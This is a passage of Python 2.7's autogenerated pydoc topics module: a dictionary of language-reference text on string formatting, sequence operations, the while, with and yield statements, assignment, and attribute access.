Python object using repr()). | (5) |\n+--------------+-------------------------------------------------------+---------+\n| "\'s\'" | String (converts any Python object using "str()"). | (6) |\n+--------------+-------------------------------------------------------+---------+\n| "\'%\'" | No argument is converted, results in a "\'%\'" | |\n| | character in the result. | |\n+--------------+-------------------------------------------------------+---------+\n\nNotes:\n\n1. The alternate form causes a leading zero ("\'0\'") to be inserted\n between left-hand padding and the formatting of the number if the\n leading character of the result is not already a zero.\n\n2. The alternate form causes a leading "\'0x\'" or "\'0X\'" (depending\n on whether the "\'x\'" or "\'X\'" format was used) to be inserted\n between left-hand padding and the formatting of the number if the\n leading character of the result is not already a zero.\n\n3. The alternate form causes the result to always contain a decimal\n point, even if no digits follow it.\n\n The precision determines the number of digits after the decimal\n point and defaults to 6.\n\n4. The alternate form causes the result to always contain a decimal\n point, and trailing zeroes are not removed as they would otherwise\n be.\n\n The precision determines the number of significant digits before\n and after the decimal point and defaults to 6.\n\n5. The "%r" conversion was added in Python 2.0.\n\n The precision determines the maximal number of characters used.\n\n6. If the object or format provided is a "unicode" string, the\n resulting string will also be "unicode".\n\n The precision determines the maximal number of characters used.\n\n7. See **PEP 237**.\n\nSince Python strings have an explicit length, "%s" conversions do not\nassume that "\'\\0\'" is the end of the string.\n\nChanged in version 2.7: "%f" conversions for numbers whose absolute\nvalue is over 1e50 are no longer replaced by "%g" conversions.\n\nAdditional string operations are defined in standard modules "string"\nand "re".\n\n\nXRange Type\n===========\n\nThe "xrange" type is an immutable sequence which is commonly used for\nlooping. The advantage of the "xrange" type is that an "xrange"\nobject will always take the same amount of memory, no matter the size\nof the range it represents. There are no consistent performance\nadvantages.\n\nXRange objects have very little behavior: they only support indexing,\niteration, and the "len()" function.\n\n\nMutable Sequence Types\n======================\n\nList and "bytearray" objects support additional operations that allow\nin-place modification of the object. Other mutable sequence types\n(when added to the language) should also support these operations.\nStrings and tuples are immutable sequence types: such objects cannot\nbe modified once created. The following operations are defined on\nmutable sequence types (where *x* is an arbitrary object):\n\n+--------------------------------+----------------------------------+-----------------------+\n| Operation | Result | Notes |\n+================================+==================================+=======================+\n| "s[i] = x" | item *i* of *s* is replaced by | |\n| | *x* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j] = t" | slice of *s* from *i* to *j* is | |\n| | replaced by the contents of the | |\n| | iterable *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j]" | same as "s[i:j] = []" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j:k] = t" | the elements of "s[i:j:k]" are | (1) |\n| | replaced by those of *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j:k]" | removes the elements of | |\n| | "s[i:j:k]" from the list | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.append(x)" | same as "s[len(s):len(s)] = [x]" | (2) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.extend(x)" or "s += t" | for the most part the same as | (3) |\n| | "s[len(s):len(s)] = x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s *= n" | updates *s* with its contents | (11) |\n| | repeated *n* times | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.count(x)" | return number of *i*\'s for which | |\n| | "s[i] == x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.index(x[, i[, j]])" | return smallest *k* such that | (4) |\n| | "s[k] == x" and "i <= k < j" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.insert(i, x)" | same as "s[i:i] = [x]" | (5) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.pop([i])" | same as "x = s[i]; del s[i]; | (6) |\n| | return x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.remove(x)" | same as "del s[s.index(x)]" | (4) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.reverse()" | reverses the items of *s* in | (7) |\n| | place | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.sort([cmp[, key[, | sort the items of *s* in place | (7)(8)(9)(10) |\n| reverse]]])" | | |\n+--------------------------------+----------------------------------+-----------------------+\n\nNotes:\n\n1. *t* must have the same length as the slice it is replacing.\n\n2. The C implementation of Python has historically accepted\n multiple parameters and implicitly joined them into a tuple; this\n no longer works in Python 2.0. Use of this misfeature has been\n deprecated since Python 1.4.\n\n3. *x* can be any iterable object.\n\n4. Raises "ValueError" when *x* is not found in *s*. When a\n negative index is passed as the second or third parameter to the\n "index()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, "index()" didn\'t have arguments\n for specifying start and stop positions.\n\n5. When a negative index is passed as the first parameter to the\n "insert()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, all negative indices were\n truncated to zero.\n\n6. The "pop()" method\'s optional argument *i* defaults to "-1", so\n that by default the last item is removed and returned.\n\n7. The "sort()" and "reverse()" methods modify the list in place\n for economy of space when sorting or reversing a large list. To\n remind you that they operate by side effect, they don\'t return the\n sorted or reversed list.\n\n8. The "sort()" method takes optional arguments for controlling the\n comparisons.\n\n *cmp* specifies a custom comparison function of two arguments (list\n items) which should return a negative, zero or positive number\n depending on whether the first argument is considered smaller than,\n equal to, or larger than the second argument: "cmp=lambda x,y:\n cmp(x.lower(), y.lower())". The default value is "None".\n\n *key* specifies a function of one argument that is used to extract\n a comparison key from each list element: "key=str.lower". The\n default value is "None".\n\n *reverse* is a boolean value. If set to "True", then the list\n elements are sorted as if each comparison were reversed.\n\n In general, the *key* and *reverse* conversion processes are much\n faster than specifying an equivalent *cmp* function. This is\n because *cmp* is called multiple times for each list element while\n *key* and *reverse* touch each element only once. Use\n "functools.cmp_to_key()" to convert an old-style *cmp* function to\n a *key* function.\n\n Changed in version 2.3: Support for "None" as an equivalent to\n omitting *cmp* was added.\n\n Changed in version 2.4: Support for *key* and *reverse* was added.\n\n9. Starting with Python 2.3, the "sort()" method is guaranteed to\n be stable. A sort is stable if it guarantees not to change the\n relative order of elements that compare equal --- this is helpful\n for sorting in multiple passes (for example, sort by department,\n then by salary grade).\n\n10. **CPython implementation detail:** While a list is being\n sorted, the effect of attempting to mutate, or even inspect, the\n list is undefined. The C implementation of Python 2.3 and newer\n makes the list appear empty for the duration, and raises\n "ValueError" if it can detect that the list has been mutated\n during a sort.\n\n11. The value *n* is an integer, or an object implementing\n "__index__()". Zero and negative values of *n* clear the\n sequence. Items in the sequence are not copied; they are\n referenced multiple times, as explained for "s * n" under Sequence\n Types --- str, unicode, list, tuple, bytearray, buffer, xrange.\n', 'typesseq-mutable': u'\nMutable Sequence Types\n**********************\n\nList and "bytearray" objects support additional operations that allow\nin-place modification of the object. Other mutable sequence types\n(when added to the language) should also support these operations.\nStrings and tuples are immutable sequence types: such objects cannot\nbe modified once created. The following operations are defined on\nmutable sequence types (where *x* is an arbitrary object):\n\n+--------------------------------+----------------------------------+-----------------------+\n| Operation | Result | Notes |\n+================================+==================================+=======================+\n| "s[i] = x" | item *i* of *s* is replaced by | |\n| | *x* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j] = t" | slice of *s* from *i* to *j* is | |\n| | replaced by the contents of the | |\n| | iterable *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j]" | same as "s[i:j] = []" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j:k] = t" | the elements of "s[i:j:k]" are | (1) |\n| | replaced by those of *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j:k]" | removes the elements of | |\n| | "s[i:j:k]" from the list | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.append(x)" | same as "s[len(s):len(s)] = [x]" | (2) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.extend(x)" or "s += t" | for the most part the same as | (3) |\n| | "s[len(s):len(s)] = x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s *= n" | updates *s* with its contents | (11) |\n| | repeated *n* times | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.count(x)" | return number of *i*\'s for which | |\n| | "s[i] == x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.index(x[, i[, j]])" | return smallest *k* such that | (4) |\n| | "s[k] == x" and "i <= k < j" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.insert(i, x)" | same as "s[i:i] = [x]" | (5) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.pop([i])" | same as "x = s[i]; del s[i]; | (6) |\n| | return x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.remove(x)" | same as "del s[s.index(x)]" | (4) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.reverse()" | reverses the items of *s* in | (7) |\n| | place | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.sort([cmp[, key[, | sort the items of *s* in place | (7)(8)(9)(10) |\n| reverse]]])" | | |\n+--------------------------------+----------------------------------+-----------------------+\n\nNotes:\n\n1. *t* must have the same length as the slice it is replacing.\n\n2. The C implementation of Python has historically accepted\n multiple parameters and implicitly joined them into a tuple; this\n no longer works in Python 2.0. Use of this misfeature has been\n deprecated since Python 1.4.\n\n3. *x* can be any iterable object.\n\n4. Raises "ValueError" when *x* is not found in *s*. When a\n negative index is passed as the second or third parameter to the\n "index()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, "index()" didn\'t have arguments\n for specifying start and stop positions.\n\n5. When a negative index is passed as the first parameter to the\n "insert()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, all negative indices were\n truncated to zero.\n\n6. The "pop()" method\'s optional argument *i* defaults to "-1", so\n that by default the last item is removed and returned.\n\n7. The "sort()" and "reverse()" methods modify the list in place\n for economy of space when sorting or reversing a large list. To\n remind you that they operate by side effect, they don\'t return the\n sorted or reversed list.\n\n8. The "sort()" method takes optional arguments for controlling the\n comparisons.\n\n *cmp* specifies a custom comparison function of two arguments (list\n items) which should return a negative, zero or positive number\n depending on whether the first argument is considered smaller than,\n equal to, or larger than the second argument: "cmp=lambda x,y:\n cmp(x.lower(), y.lower())". The default value is "None".\n\n *key* specifies a function of one argument that is used to extract\n a comparison key from each list element: "key=str.lower". The\n default value is "None".\n\n *reverse* is a boolean value. If set to "True", then the list\n elements are sorted as if each comparison were reversed.\n\n In general, the *key* and *reverse* conversion processes are much\n faster than specifying an equivalent *cmp* function. This is\n because *cmp* is called multiple times for each list element while\n *key* and *reverse* touch each element only once. Use\n "functools.cmp_to_key()" to convert an old-style *cmp* function to\n a *key* function.\n\n Changed in version 2.3: Support for "None" as an equivalent to\n omitting *cmp* was added.\n\n Changed in version 2.4: Support for *key* and *reverse* was added.\n\n9. Starting with Python 2.3, the "sort()" method is guaranteed to\n be stable. A sort is stable if it guarantees not to change the\n relative order of elements that compare equal --- this is helpful\n for sorting in multiple passes (for example, sort by department,\n then by salary grade).\n\n10. **CPython implementation detail:** While a list is being\n sorted, the effect of attempting to mutate, or even inspect, the\n list is undefined. The C implementation of Python 2.3 and newer\n makes the list appear empty for the duration, and raises\n "ValueError" if it can detect that the list has been mutated\n during a sort.\n\n11. The value *n* is an integer, or an object implementing\n "__index__()". Zero and negative values of *n* clear the\n sequence. Items in the sequence are not copied; they are\n referenced multiple times, as explained for "s * n" under Sequence\n Types --- str, unicode, list, tuple, bytearray, buffer, xrange.\n', 'unary': u'\nUnary arithmetic and bitwise operations\n***************************************\n\nAll unary arithmetic and bitwise operations have the same priority:\n\n u_expr ::= power | "-" u_expr | "+" u_expr | "~" u_expr\n\nThe unary "-" (minus) operator yields the negation of its numeric\nargument.\n\nThe unary "+" (plus) operator yields its numeric argument unchanged.\n\nThe unary "~" (invert) operator yields the bitwise inversion of its\nplain or long integer argument. The bitwise inversion of "x" is\ndefined as "-(x+1)". It only applies to integral numbers.\n\nIn all three cases, if the argument does not have the proper type, a\n"TypeError" exception is raised.\n', 'while': u'\nThe "while" statement\n*********************\n\nThe "while" statement is used for repeated execution as long as an\nexpression is true:\n\n while_stmt ::= "while" expression ":" suite\n ["else" ":" suite]\n\nThis repeatedly tests the expression and, if it is true, executes the\nfirst suite; if the expression is false (which may be the first time\nit is tested) the suite of the "else" clause, if present, is executed\nand the loop terminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. A "continue" statement\nexecuted in the first suite skips the rest of the suite and goes back\nto testing the expression.\n', 'with': u'\nThe "with" statement\n********************\n\nNew in version 2.5.\n\nThe "with" statement is used to wrap the execution of a block with\nmethods defined by a context manager (see section With Statement\nContext Managers). This allows common "try"..."except"..."finally"\nusage patterns to be encapsulated for convenient reuse.\n\n with_stmt ::= "with" with_item ("," with_item)* ":" suite\n with_item ::= expression ["as" target]\n\nThe execution of the "with" statement with one "item" proceeds as\nfollows:\n\n1. The context expression (the expression given in the "with_item")\n is evaluated to obtain a context manager.\n\n2. The context manager\'s "__exit__()" is loaded for later use.\n\n3. The context manager\'s "__enter__()" method is invoked.\n\n4. If a target was included in the "with" statement, the return\n value from "__enter__()" is assigned to it.\n\n Note: The "with" statement guarantees that if the "__enter__()"\n method returns without an error, then "__exit__()" will always be\n called. Thus, if an error occurs during the assignment to the\n target list, it will be treated the same as an error occurring\n within the suite would be. See step 6 below.\n\n5. The suite is executed.\n\n6. The context manager\'s "__exit__()" method is invoked. If an\n exception caused the suite to be exited, its type, value, and\n traceback are passed as arguments to "__exit__()". Otherwise, three\n "None" arguments are supplied.\n\n If the suite was exited due to an exception, and the return value\n from the "__exit__()" method was false, the exception is reraised.\n If the return value was true, the exception is suppressed, and\n execution continues with the statement following the "with"\n statement.\n\n If the suite was exited for any reason other than an exception, the\n return value from "__exit__()" is ignored, and execution proceeds\n at the normal location for the kind of exit that was taken.\n\nWith more than one item, the context managers are processed as if\nmultiple "with" statements were nested:\n\n with A() as a, B() as b:\n suite\n\nis equivalent to\n\n with A() as a:\n with B() as b:\n suite\n\nNote: In Python 2.5, the "with" statement is only allowed when the\n "with_statement" feature has been enabled. It is always enabled in\n Python 2.6.\n\nChanged in version 2.7: Support for multiple context expressions.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n', 'yield': u'\nThe "yield" statement\n*********************\n\n yield_stmt ::= yield_expression\n\nThe "yield" statement is only used when defining a generator function,\nand is only used in the body of the generator function. Using a\n"yield" statement in a function definition is sufficient to cause that\ndefinition to create a generator function instead of a normal\nfunction.\n\nWhen a generator function is called, it returns an iterator known as a\ngenerator iterator, or more commonly, a generator. The body of the\ngenerator function is executed by calling the generator\'s "next()"\nmethod repeatedly until it raises an exception.\n\nWhen a "yield" statement is executed, the state of the generator is\nfrozen and the value of "expression_list" is returned to "next()"\'s\ncaller. By "frozen" we mean that all local state is retained,\nincluding the current bindings of local variables, the instruction\npointer, and the internal evaluation stack: enough information is\nsaved so that the next time "next()" is invoked, the function can\nproceed exactly as if the "yield" statement were just another external\ncall.\n\nAs of Python version 2.5, the "yield" statement is now allowed in the\n"try" clause of a "try" ... "finally" construct. If the generator is\nnot resumed before it is finalized (by reaching a zero reference count\nor by being garbage collected), the generator-iterator\'s "close()"\nmethod will be called, allowing any pending "finally" clauses to\nexecute.\n\nFor full details of "yield" semantics, refer to the Yield expressions\nsection.\n\nNote: In Python 2.2, the "yield" statement was only allowed when the\n "generators" feature has been enabled. This "__future__" import\n statement was used to enable the feature:\n\n from __future__ import generators\n\nSee also:\n\n **PEP 0255** - Simple Generators\n The proposal for adding generators and the "yield" statement to\n Python.\n\n **PEP 0342** - Coroutines via Enhanced Generators\n The proposal that, among other generator enhancements, proposed\n allowing "yield" to appear inside a "try" ... "finally" block.\n'}
# -*- coding: utf-8 -*- # Autogenerated by Sphinx on Wed Jan 6 03:48:54 2016 topics = {'assert': u'\nThe "assert" statement\n**********************\n\nAssert statements are a convenient way to insert debugging assertions\ninto a program:\n\n assert_stmt ::= "assert" expression ["," expression]\n\nThe simple form, "assert expression", is equivalent to\n\n if __debug__:\n if not expression: raise AssertionError\n\nThe extended form, "assert expression1, expression2", is equivalent to\n\n if __debug__:\n if not expression1: raise AssertionError(expression2)\n\nThese equivalences assume that "__debug__" and "AssertionError" refer\nto the built-in variables with those names. In the current\nimplementation, the built-in variable "__debug__" is "True" under\nnormal circumstances, "False" when optimization is requested (command\nline option -O). The current code generator emits no code for an\nassert statement when optimization is requested at compile time. Note\nthat it is unnecessary to include the source code for the expression\nthat failed in the error message; it will be displayed as part of the\nstack trace.\n\nAssignments to "__debug__" are illegal. The value for the built-in\nvariable is determined when the interpreter starts.\n', 'assignment': u'\nAssignment statements\n*********************\n\nAssignment statements are used to (re)bind names to values and to\nmodify attributes or items of mutable objects:\n\n assignment_stmt ::= (target_list "=")+ (expression_list | yield_expression)\n target_list ::= target ("," target)* [","]\n target ::= identifier\n | "(" target_list ")"\n | "[" target_list "]"\n | attributeref\n | subscription\n | slicing\n\n(See section Primaries for the syntax definitions for the last three\nsymbols.)\n\nAn assignment statement evaluates the expression list (remember that\nthis can be a single expression or a comma-separated list, the latter\nyielding a tuple) and assigns the single resulting object to each of\nthe target lists, from left to right.\n\nAssignment is defined recursively depending on the form of the target\n(list). When a target is part of a mutable object (an attribute\nreference, subscription or slicing), the mutable object must\nultimately perform the assignment and decide about its validity, and\nmay raise an exception if the assignment is unacceptable. The rules\nobserved by various types and the exceptions raised are given with the\ndefinition of the object types (see section The standard type\nhierarchy).\n\nAssignment of an object to a target list is recursively defined as\nfollows.\n\n* If the target list is a single target: The object is assigned to\n that target.\n\n* If the target list is a comma-separated list of targets: The\n object must be an iterable with the same number of items as there\n are targets in the target list, and the items are assigned, from\n left to right, to the corresponding targets.\n\nAssignment of an object to a single target is recursively defined as\nfollows.\n\n* If the target is an identifier (name):\n\n * If the name does not occur in a "global" statement in the\n current code block: the name is bound to the object in the current\n local namespace.\n\n * Otherwise: the name is bound to the object in the current global\n namespace.\n\n The name is rebound if it was already bound. This may cause the\n reference count for the object previously bound to the name to reach\n zero, causing the object to be deallocated and its destructor (if it\n has one) to be called.\n\n* If the target is a target list enclosed in parentheses or in\n square brackets: The object must be an iterable with the same number\n of items as there are targets in the target list, and its items are\n assigned, from left to right, to the corresponding targets.\n\n* If the target is an attribute reference: The primary expression in\n the reference is evaluated. It should yield an object with\n assignable attributes; if this is not the case, "TypeError" is\n raised. That object is then asked to assign the assigned object to\n the given attribute; if it cannot perform the assignment, it raises\n an exception (usually but not necessarily "AttributeError").\n\n Note: If the object is a class instance and the attribute reference\n occurs on both sides of the assignment operator, the RHS expression,\n "a.x" can access either an instance attribute or (if no instance\n attribute exists) a class attribute. The LHS target "a.x" is always\n set as an instance attribute, creating it if necessary. Thus, the\n two occurrences of "a.x" do not necessarily refer to the same\n attribute: if the RHS expression refers to a class attribute, the\n LHS creates a new instance attribute as the target of the\n assignment:\n\n class Cls:\n x = 3 # class variable\n inst = Cls()\n inst.x = inst.x + 1 # writes inst.x as 4 leaving Cls.x as 3\n\n This description does not necessarily apply to descriptor\n attributes, such as properties created with "property()".\n\n* If the target is a subscription: The primary expression in the\n reference is evaluated. It should yield either a mutable sequence\n object (such as a list) or a mapping object (such as a dictionary).\n Next, the subscript expression is evaluated.\n\n If the primary is a mutable sequence object (such as a list), the\n subscript must yield a plain integer. If it is negative, the\n sequence\'s length is added to it. The resulting value must be a\n nonnegative integer less than the sequence\'s length, and the\n sequence is asked to assign the assigned object to its item with\n that index. If the index is out of range, "IndexError" is raised\n (assignment to a subscripted sequence cannot add new items to a\n list).\n\n If the primary is a mapping object (such as a dictionary), the\n subscript must have a type compatible with the mapping\'s key type,\n and the mapping is then asked to create a key/datum pair which maps\n the subscript to the assigned object. This can either replace an\n existing key/value pair with the same key value, or insert a new\n key/value pair (if no key with the same value existed).\n\n* If the target is a slicing: The primary expression in the\n reference is evaluated. It should yield a mutable sequence object\n (such as a list). The assigned object should be a sequence object\n of the same type. Next, the lower and upper bound expressions are\n evaluated, insofar they are present; defaults are zero and the\n sequence\'s length. The bounds should evaluate to (small) integers.\n If either bound is negative, the sequence\'s length is added to it.\n The resulting bounds are clipped to lie between zero and the\n sequence\'s length, inclusive. Finally, the sequence object is asked\n to replace the slice with the items of the assigned sequence. The\n length of the slice may be different from the length of the assigned\n sequence, thus changing the length of the target sequence, if the\n object allows it.\n\n**CPython implementation detail:** In the current implementation, the\nsyntax for targets is taken to be the same as for expressions, and\ninvalid syntax is rejected during the code generation phase, causing\nless detailed error messages.\n\nWARNING: Although the definition of assignment implies that overlaps\nbetween the left-hand side and the right-hand side are \'safe\' (for\nexample "a, b = b, a" swaps two variables), overlaps *within* the\ncollection of assigned-to variables are not safe! For instance, the\nfollowing program prints "[0, 2]":\n\n x = [0, 1]\n i = 0\n i, x[i] = 1, 2\n print x\n\n\nAugmented assignment statements\n===============================\n\nAugmented assignment is the combination, in a single statement, of a\nbinary operation and an assignment statement:\n\n augmented_assignment_stmt ::= augtarget augop (expression_list | yield_expression)\n augtarget ::= identifier | attributeref | subscription | slicing\n augop ::= "+=" | "-=" | "*=" | "/=" | "//=" | "%=" | "**="\n | ">>=" | "<<=" | "&=" | "^=" | "|="\n\n(See section Primaries for the syntax definitions for the last three\nsymbols.)\n\nAn augmented assignment evaluates the target (which, unlike normal\nassignment statements, cannot be an unpacking) and the expression\nlist, performs the binary operation specific to the type of assignment\non the two operands, and assigns the result to the original target.\nThe target is only evaluated once.\n\nAn augmented assignment expression like "x += 1" can be rewritten as\n"x = x + 1" to achieve a similar, but not exactly equal effect. In the\naugmented version, "x" is only evaluated once. Also, when possible,\nthe actual operation is performed *in-place*, meaning that rather than\ncreating a new object and assigning that to the target, the old object\nis modified instead.\n\nWith the exception of assigning to tuples and multiple targets in a\nsingle statement, the assignment done by augmented assignment\nstatements is handled the same way as normal assignments. Similarly,\nwith the exception of the possible *in-place* behavior, the binary\noperation performed by augmented assignment is the same as the normal\nbinary operations.\n\nFor targets which are attribute references, the same caveat about\nclass and instance attributes applies as for regular assignments.\n', 'atom-identifiers': u'\nIdentifiers (Names)\n*******************\n\nAn identifier occurring as an atom is a name. See section Identifiers\nand keywords for lexical definition and section Naming and binding for\ndocumentation of naming and binding.\n\nWhen the name is bound to an object, evaluation of the atom yields\nthat object. When a name is not bound, an attempt to evaluate it\nraises a "NameError" exception.\n\n**Private name mangling:** When an identifier that textually occurs in\na class definition begins with two or more underscore characters and\ndoes not end in two or more underscores, it is considered a *private\nname* of that class. Private names are transformed to a longer form\nbefore code is generated for them. The transformation inserts the\nclass name, with leading underscores removed and a single underscore\ninserted, in front of the name. For example, the identifier "__spam"\noccurring in a class named "Ham" will be transformed to "_Ham__spam".\nThis transformation is independent of the syntactical context in which\nthe identifier is used. If the transformed name is extremely long\n(longer than 255 characters), implementation defined truncation may\nhappen. If the class name consists only of underscores, no\ntransformation is done.\n', 'atom-literals': u"\nLiterals\n********\n\nPython supports string literals and various numeric literals:\n\n literal ::= stringliteral | integer | longinteger\n | floatnumber | imagnumber\n\nEvaluation of a literal yields an object of the given type (string,\ninteger, long integer, floating point number, complex number) with the\ngiven value. The value may be approximated in the case of floating\npoint and imaginary (complex) literals. See section Literals for\ndetails.\n\nAll literals correspond to immutable data types, and hence the\nobject's identity is less important than its value. Multiple\nevaluations of literals with the same value (either the same\noccurrence in the program text or a different occurrence) may obtain\nthe same object or a different object with the same value.\n", 'attribute-access': u'\nCustomizing attribute access\n****************************\n\nThe following methods can be defined to customize the meaning of\nattribute access (use of, assignment to, or deletion of "x.name") for\nclass instances.\n\nobject.__getattr__(self, name)\n\n Called when an attribute lookup has not found the attribute in the\n usual places (i.e. it is not an instance attribute nor is it found\n in the class tree for "self"). "name" is the attribute name. This\n method should return the (computed) attribute value or raise an\n "AttributeError" exception.\n\n Note that if the attribute is found through the normal mechanism,\n "__getattr__()" is not called. (This is an intentional asymmetry\n between "__getattr__()" and "__setattr__()".) This is done both for\n efficiency reasons and because otherwise "__getattr__()" would have\n no way to access other attributes of the instance. Note that at\n least for instance variables, you can fake total control by not\n inserting any values in the instance attribute dictionary (but\n instead inserting them in another object). See the\n "__getattribute__()" method below for a way to actually get total\n control in new-style classes.\n\nobject.__setattr__(self, name, value)\n\n Called when an attribute assignment is attempted. This is called\n instead of the normal mechanism (i.e. store the value in the\n instance dictionary). *name* is the attribute name, *value* is the\n value to be assigned to it.\n\n If "__setattr__()" wants to assign to an instance attribute, it\n should not simply execute "self.name = value" --- this would cause\n a recursive call to itself. Instead, it should insert the value in\n the dictionary of instance attributes, e.g., "self.__dict__[name] =\n value". For new-style classes, rather than accessing the instance\n dictionary, it should call the base class method with the same\n name, for example, "object.__setattr__(self, name, value)".\n\nobject.__delattr__(self, name)\n\n Like "__setattr__()" but for attribute deletion instead of\n assignment. This should only be implemented if "del obj.name" is\n meaningful for the object.\n\n\nMore attribute access for new-style classes\n===========================================\n\nThe following methods only apply to new-style classes.\n\nobject.__getattribute__(self, name)\n\n Called unconditionally to implement attribute accesses for\n instances of the class. If the class also defines "__getattr__()",\n the latter will not be called unless "__getattribute__()" either\n calls it explicitly or raises an "AttributeError". This method\n should return the (computed) attribute value or raise an\n "AttributeError" exception. In order to avoid infinite recursion in\n this method, its implementation should always call the base class\n method with the same name to access any attributes it needs, for\n example, "object.__getattribute__(self, name)".\n\n Note: This method may still be bypassed when looking up special\n methods as the result of implicit invocation via language syntax\n or built-in functions. See Special method lookup for new-style\n classes.\n\n\nImplementing Descriptors\n========================\n\nThe following methods only apply when an instance of the class\ncontaining the method (a so-called *descriptor* class) appears in an\n*owner* class (the descriptor must be in either the owner\'s class\ndictionary or in the class dictionary for one of its parents). In the\nexamples below, "the attribute" refers to the attribute whose name is\nthe key of the property in the owner class\' "__dict__".\n\nobject.__get__(self, instance, owner)\n\n Called to get the attribute of the owner class (class attribute\n access) or of an instance of that class (instance attribute\n access). *owner* is always the owner class, while *instance* is the\n instance that the attribute was accessed through, or "None" when\n the attribute is accessed through the *owner*. This method should\n return the (computed) attribute value or raise an "AttributeError"\n exception.\n\nobject.__set__(self, instance, value)\n\n Called to set the attribute on an instance *instance* of the owner\n class to a new value, *value*.\n\nobject.__delete__(self, instance)\n\n Called to delete the attribute on an instance *instance* of the\n owner class.\n\n\nInvoking Descriptors\n====================\n\nIn general, a descriptor is an object attribute with "binding\nbehavior", one whose attribute access has been overridden by methods\nin the descriptor protocol: "__get__()", "__set__()", and\n"__delete__()". If any of those methods are defined for an object, it\nis said to be a descriptor.\n\nThe default behavior for attribute access is to get, set, or delete\nthe attribute from an object\'s dictionary. For instance, "a.x" has a\nlookup chain starting with "a.__dict__[\'x\']", then\n"type(a).__dict__[\'x\']", and continuing through the base classes of\n"type(a)" excluding metaclasses.\n\nHowever, if the looked-up value is an object defining one of the\ndescriptor methods, then Python may override the default behavior and\ninvoke the descriptor method instead. Where this occurs in the\nprecedence chain depends on which descriptor methods were defined and\nhow they were called. Note that descriptors are only invoked for new\nstyle objects or classes (ones that subclass "object()" or "type()").\n\nThe starting point for descriptor invocation is a binding, "a.x". How\nthe arguments are assembled depends on "a":\n\nDirect Call\n The simplest and least common call is when user code directly\n invokes a descriptor method: "x.__get__(a)".\n\nInstance Binding\n If binding to a new-style object instance, "a.x" is transformed\n into the call: "type(a).__dict__[\'x\'].__get__(a, type(a))".\n\nClass Binding\n If binding to a new-style class, "A.x" is transformed into the\n call: "A.__dict__[\'x\'].__get__(None, A)".\n\nSuper Binding\n If "a" is an instance of "super", then the binding "super(B,\n obj).m()" searches "obj.__class__.__mro__" for the base class "A"\n immediately preceding "B" and then invokes the descriptor with the\n call: "A.__dict__[\'m\'].__get__(obj, obj.__class__)".\n\nFor instance bindings, the precedence of descriptor invocation depends\non the which descriptor methods are defined. A descriptor can define\nany combination of "__get__()", "__set__()" and "__delete__()". If it\ndoes not define "__get__()", then accessing the attribute will return\nthe descriptor object itself unless there is a value in the object\'s\ninstance dictionary. If the descriptor defines "__set__()" and/or\n"__delete__()", it is a data descriptor; if it defines neither, it is\na non-data descriptor. Normally, data descriptors define both\n"__get__()" and "__set__()", while non-data descriptors have just the\n"__get__()" method. Data descriptors with "__set__()" and "__get__()"\ndefined always override a redefinition in an instance dictionary. In\ncontrast, non-data descriptors can be overridden by instances.\n\nPython methods (including "staticmethod()" and "classmethod()") are\nimplemented as non-data descriptors. Accordingly, instances can\nredefine and override methods. This allows individual instances to\nacquire behaviors that differ from other instances of the same class.\n\nThe "property()" function is implemented as a data descriptor.\nAccordingly, instances cannot override the behavior of a property.\n\n\n__slots__\n=========\n\nBy default, instances of both old and new-style classes have a\ndictionary for attribute storage. This wastes space for objects\nhaving very few instance variables. The space consumption can become\nacute when creating large numbers of instances.\n\nThe default can be overridden by defining *__slots__* in a new-style\nclass definition. The *__slots__* declaration takes a sequence of\ninstance variables and reserves just enough space in each instance to\nhold a value for each variable. Space is saved because *__dict__* is\nnot created for each instance.\n\n__slots__\n\n This class variable can be assigned a string, iterable, or sequence\n of strings with variable names used by instances. If defined in a\n new-style class, *__slots__* reserves space for the declared\n variables and prevents the automatic creation of *__dict__* and\n *__weakref__* for each instance.\n\n New in version 2.2.\n\nNotes on using *__slots__*\n\n* When inheriting from a class without *__slots__*, the *__dict__*\n attribute of that class will always be accessible, so a *__slots__*\n definition in the subclass is meaningless.\n\n* Without a *__dict__* variable, instances cannot be assigned new\n variables not listed in the *__slots__* definition. Attempts to\n assign to an unlisted variable name raises "AttributeError". If\n dynamic assignment of new variables is desired, then add\n "\'__dict__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__dict__\'" to the\n *__slots__* declaration would not enable the assignment of new\n attributes not specifically listed in the 